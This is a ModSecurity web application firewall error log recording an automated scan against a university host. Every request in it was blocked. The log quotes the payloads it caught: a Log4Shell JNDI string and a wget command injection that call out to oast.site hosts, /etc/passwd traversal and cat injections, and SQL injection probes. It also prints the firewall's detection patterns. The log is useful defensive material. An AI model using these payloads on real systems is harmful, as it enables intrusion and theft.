[Tue Aug 29 11:33:26.471320 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgzpfa9hupk9ssh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARQ3@EAAAAB"]
[Tue Aug 29 11:33:27.308328 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARTEOkAAAAG"]
[Tue Aug 29 11:33:27.330770 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARo8ygAAAAT"]
[Tue Aug 29 11:33:27.349610 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARv7Q8AAAAY"]
[Tue Aug 29 11:33:28.305630 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11GMCo-f0AAAOJKdsAAAAE"]
[Tue Aug 29 11:33:29.315616 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAANsAf8AAAAD"]
[Tue Aug 29 11:33:31.213683 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfh.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlYAAAAs"]
[Tue Aug 29 11:33:31.216533 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "repositoryfh.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11G8Co-f0AAAQKOlYAAAAs"]
[Tue Aug 29 11:33:32.050305 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARo8zcAAAAT"]
[Tue Aug 29 11:33:32.312259 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgdz9bpmhfzg6us.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAANsAhUAAAAD"]
[Tue Aug 29 11:33:32.462394 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARfwncAAAAI"]
[Tue Aug 29 11:33:34.364520 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAARA7hcAAAAA"]
[Tue Aug 29 11:33:35.354032 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAAOJKeoAAAAE"]
[Tue Aug 29 11:33:35.391273 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARo80YAAAAT"]
[Tue Aug 29 11:33:36.359320 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARt--MAAAAV"]
[Tue Aug 29 11:33:36.367489 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11IMCo-f0AAASAHakAAAAH"]
[Tue Aug 29 11:33:36.387204 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAASAHaoAAAAH"]
[Tue Aug 29 11:33:37.349028 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAARo800AAAAT"]
[Tue Aug 29 11:33:37.391188 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARy-wMAAAAb"]
[Tue Aug 29 11:33:38.413000 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IsCo-f0AAAOJKfoAAAAE"]
[Tue Aug 29 11:33:38.440877 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAARo81IAAAAT"]
[Tue Aug 29 11:33:39.330945 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAARv7UEAAAAY"]
[Tue Aug 29 11:33:40.299935 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARv7UUAAAAY"]
[Tue Aug 29 11:33:40.401548 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARjjPkAAAAL"]
[Tue Aug 29 11:33:40.417738 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAARv7UoAAAAY"]
[Tue Aug 29 11:33:41.324694 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAARQ4AwAAAAB"]
[Tue Aug 29 11:33:41.348840 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfh.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JcCo-f0AAASBXR8AAAAM"]
[Tue Aug 29 11:33:41.431656 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAARA7jQAAAAA"]
